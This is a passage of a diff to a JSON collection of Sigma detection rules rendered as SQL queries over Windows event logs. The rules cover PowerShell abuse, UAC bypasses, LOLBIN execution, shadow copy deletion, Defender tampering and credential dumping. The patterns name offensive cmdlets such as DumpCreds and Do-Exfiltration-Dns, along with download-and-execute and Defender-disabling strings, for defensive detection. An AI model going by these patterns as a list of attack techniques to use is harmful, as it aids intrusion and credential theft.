ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", - "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "title": 
"TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "status": "test", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.t1003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Diagnostics" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": 
"posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative scripts that use the same keywords." - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" - ], - "filename": "posh_ps_wmimplant.yml" - }, - { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, 
Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "status": "experimental", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", + "status": "test", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + 
"attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. 
Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE 
'%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ - "attack.defense_evasion", "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE 
'%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "author": "frack113", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": 
"posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. 
Or set default actions to allow.", - "author": "frack113", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE 
